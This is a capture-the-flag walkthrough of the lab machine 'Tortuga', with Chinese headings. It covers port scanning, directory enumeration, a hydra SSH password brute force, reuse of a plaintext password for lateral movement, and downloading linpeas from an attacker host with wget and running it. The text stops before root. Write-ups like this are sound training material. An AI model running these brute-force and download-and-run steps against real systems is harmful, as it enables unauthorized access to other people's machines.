Tortuga

信息搜集

192.168.100.51

端口扫描

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# rustscan -a 192.168.100.51
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.51:80
Open 192.168.100.51:22
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 12:40 +0800
Initiating ARP Ping Scan at 12:40
Scanning 192.168.100.51 [1 port]
Completed ARP Ping Scan at 12:40, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:40
Completed Parallel DNS resolution of 1 host. at 12:40, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 12:40
Scanning 192.168.100.51 [2 ports]
Discovered open port 80/tcp on 192.168.100.51
Discovered open port 22/tcp on 192.168.100.51
Completed SYN Stealth Scan at 12:40, 0.01s elapsed (2 total ports)
Nmap scan report for 192.168.100.51
Host is up, received arp-response (0.00075s latency).
Scanned at 2026-03-23 12:40:09 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:D6:F0:16 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

‍

枚举 80/tcp

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# gobuster dir -u http://192.168.100.51/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,ht
mldir
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.51/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              txt,php,htmldir
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
mapa.php             (Status: 200) [Size: 922]
server-status        (Status: 403) [Size: 279]
Progress: 882232 / 882232 (100.00%)
===============================================================
Finished
===============================================================

‍

ssh爆破

mapa.php中可能是用户名

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# hydra -l grumete -P /usr/share/wordlists/rockyou.txt 192.168.100.51 ssh
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-23 12:46:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.100.51:22/
[STATUS] 222.00 tries/min, 222 tries in 00:01h, 14344179 to do in 1076:54h, 14 active
[STATUS] 218.67 tries/min, 656 tries in 00:03h, 14343746 to do in 1093:17h, 13 active
[22][ssh] host: 192.168.100.51   login: grumete   password: 1234
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-23 12:51:32

用户名：grumete

密码：1234

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# ssh grumete@192.168.100.51
The authenticity of host '192.168.100.51 (192.168.100.51)' can't be established.
ED25519 key fingerprint is: SHA256:rxn+MnWRoccfZtz9D7UjHk7lURB6CknxYKX3SMQmp34
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.100.51' (ED25519) to the list of known hosts.
grumete@192.168.100.51's password:
Linux TheHackersLabs-Tortuga 6.1.0-38-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.147-1 (2025-08-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Sep  5 11:44:07 2025 from 192.168.1.5
grumete@TheHackersLabs-Tortuga:~$
grumete@TheHackersLabs-Tortuga:~$

‍

提权

grumete -> capitan

在家目录中.nota.txt存在密码

横向移动到capitan用户

用户：capitan

密码：mar_de_fuego123

‍

capitan -> root

上传linpeas扫描一下

capitan@TheHackersLabs-Tortuga:~$ busybox wget http://192.168.100.47:9999/linpeas.sh
Connecting to 192.168.100.47:9999 (192.168.100.47:9999)
saving to 'linpeas.sh'
linpeas.sh           100% |************************************************************************************|  952k  0:00:00 ETA
'linpeas.sh' saved
capitan@TheHackersLabs-Tortuga:~$ ls
linpeas.sh
capitan@TheHackersLabs-Tortuga:~$ chmod +x linpeas.sh
capitan@TheHackersLabs-Tortuga:~$ bash linpeas.sh

‍